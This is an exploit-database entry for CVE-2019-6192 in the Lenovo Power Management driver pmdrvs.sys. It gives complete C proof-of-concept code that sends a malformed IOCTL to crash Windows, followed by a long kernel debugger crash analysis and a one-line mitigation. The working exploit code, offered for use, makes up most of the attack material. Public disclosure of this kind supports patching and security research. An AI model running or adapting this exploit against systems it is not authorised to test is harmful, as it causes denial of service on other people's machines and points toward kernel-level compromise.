Lenovo Power Management Driver 1.67.17.48 pmdrvs.sys Denial of Service (PoC)

2019.12.30
Credit: Nassim Asrir
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2019-6192
CWE: CWE-120


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC) # Date: 2019-12-11 # Exploit Author: Nassim Asrir # CVE: CVE-2019-6192 # Tested On: Windows 10(64bit) | ThinkPad T470p # Vendor : https://www.lenovo.com/us/en/ # Ref : https://support.lenovo.com/us/fr/solutions/len-29334 # Description # A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver # The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes # Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space. # Exploit #include <windows.h> #include <stdio.h> #include <conio.h> int main(int argc, char **argv) { HANDLE hDevice; DWORD bret; char szDevice[] = "\\\\.\\pmdrvs"; printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n"); printf("Opening handle to driver..\n"); if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) { printf("Device %s succesfully opened!\n", szDevice); printf("\tHandle: %p\n", hDevice); } else { printf("Error: Error opening device %s\n", szDevice); } printf("\nPress any key to DoS.."); _getch(); bret = 0; if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL)) { printf("DeviceIoControl Error - bytes returned %#x\n", bret); } CloseHandle(hDevice); return 0; } # RCA 2: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. FAULTING_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50) rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? Resetting default scope CPU_COUNT: 8 CPU_MHZ: af8 CPU_VENDOR: GenuineIntel CPU_FAMILY: 6 CPU_MODEL: 9e CPU_STEPPING: 9 CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init) BLACKBOXBSD: 1 (!blackboxbsd) BLACKBOXPNP: 1 (!blackboxpnp) CURRENT_IRQL: 0 ANALYSIS_SESSION_HOST: LAPTOP-SP ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485 ANALYSIS_VERSION: 10.0.17763.132 amd64fre LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d STACK_TEXT: ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060 ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59 ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071 ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56 ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925 00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844 THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b FOLLOWUP_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] FAULT_INSTR_CODE: 8941078b SYMBOL_STACK_INDEX: 0 FOLLOWUP_NAME: MachineOwner STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb BUGCHECK_STR: 2E8B5A19 EXCEPTION_CODE_STR: 2E8B5A19 EXCEPTION_STR: WRONG_SYMBOLS PROCESS_NAME: ntoskrnl.wrong.symbols.exe IMAGE_NAME: ntoskrnl.wrong.symbols.exe MODULE_NAME: nt_wrong_symbols SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000 BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000 TARGET_TIME: 2019-09-30T19:27:36.000Z OSBUILD: 17763 OSSERVICEPACK: 0 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 SUITE_MASK: 272 PRODUCT_TYPE: 1 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS OS_LOCALE: USER_LCID: 0 OSBUILD_TIMESTAMP: 1994-09-30 01:21:45 BUILDDATESTAMP_STR: 180914-1434 BUILDLAB_STR: rs5_release BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434 ANALYSIS_SESSION_ELAPSED_TIME: ae ANALYSIS_SOURCE: KM FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000 FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1} Followup: MachineOwner --------- 2: kd> u fffff804`28bf109d pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000) fffff804`28bf10a8 85c0 test eax,eax fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132) fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h] fffff804`28bf10b8 4885c9 test rcx,rcx fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132) 2: kd> !for_each_frame .frame /r @$Frame _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!KeBugCheckEx: fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7f09: fffff804`1f27a8e9 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x735c: fffff804`1f279d3c b801000000 mov eax,1 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!_chkstk+0x41f: fffff804`1f271b4f 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!RtlUnwindEx+0x3440: fffff804`1f1ca460 8bd0 mov edx,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000 rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40 r14=ffffc709dee8f4b0 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!ExReleaseAutoExpandPushLockExclusive+0x264: fffff804`1f0d7c24 84c0 test al,al _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7fe2: fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x42ce: fffff804`1f276cae 440f20c0 mov rax,cr8 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000 rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x5060: fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!IofCallDriver+0x59: fffff804`1f12dba9 4883c438 add rsp,38h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtQueryInformationFile+0x1071: fffff804`1f6abb11 448bf0 mov r14d,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0 rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtClose+0xffc: fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtDeviceIoControlFile+0x56: fffff804`1f64c356 4883c468 add rsp,68h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7925: fffff804`1f27a305 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 00007fff`33aaf844 ?? ??? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx # Mitigation Update to Lenovo Power Management driver version 1.67.17.48 or higher


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top